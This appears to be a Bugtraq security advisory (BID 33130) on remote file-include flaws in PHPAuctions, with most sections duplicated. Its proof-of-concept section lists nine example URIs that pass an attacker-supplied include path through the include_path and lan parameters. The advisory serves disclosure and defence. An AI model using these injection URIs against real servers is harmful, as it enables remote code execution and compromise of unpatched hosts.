PHPAuctions Multiple Remote File Include Vulnerabilities
BID:33130
Info
PHPAuctions Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 33130 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 06 2009 12:00AM |
| Updated: | Jan 06 2009 06:22PM |
| Credit: | ~darkmasking~ |
| Vulnerable: |
PHPAuctions.info PHPAuctions 0 |
| Not Vulnerable: | |
Discussion
PHPAuctions Multiple Remote File Include Vulnerabilities
PHPAuctions is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying computer; other attacks are also possible.
PHPAuctions is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying computer; other attacks are also possible.
Exploit / POC
PHPAuctions Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[path]/includes/settings.inc.php?include_path=[darkcode]
http://www.example.com/[path]/includes/auction_confirmation.inc.php?include_path=[darkcode]
http://www.example.com/[path]/includes/converter.inc.php?include_path=[darkcode]
http://www.example.com/[path]/includes/messages.inc.php?include_path=[darkcode]
http://www.example.com/[path]/includes/stats.inc.php?include_path=[darkcode]
http://www.example.com/[path]/includes/useragent.inc.php?include_path=[darkcode]
http://www.example.com/[path]/includes/user_confirmation.inc.php?include_path=[darkcode]
http://www.example.com/[path]/browse.php?lan=[darkcode]
http://www.example.com/[path]/search.php?lan=[darkcode]
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[path]/includes/settings.inc.php?include_path=[darkcode]
http://www.example.com/[path]/includes/auction_confirmation.inc.php?include_path=[darkcode]
http://www.example.com/[path]/includes/converter.inc.php?include_path=[darkcode]
http://www.example.com/[path]/includes/messages.inc.php?include_path=[darkcode]
http://www.example.com/[path]/includes/stats.inc.php?include_path=[darkcode]
http://www.example.com/[path]/includes/useragent.inc.php?include_path=[darkcode]
http://www.example.com/[path]/includes/user_confirmation.inc.php?include_path=[darkcode]
http://www.example.com/[path]/browse.php?lan=[darkcode]
http://www.example.com/[path]/search.php?lan=[darkcode]
Solution / Fix
PHPAuctions Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PHPAuctions Multiple Remote File Include Vulnerabilities
References:
References:
- Vendor Homepage (PHPAuctions.info)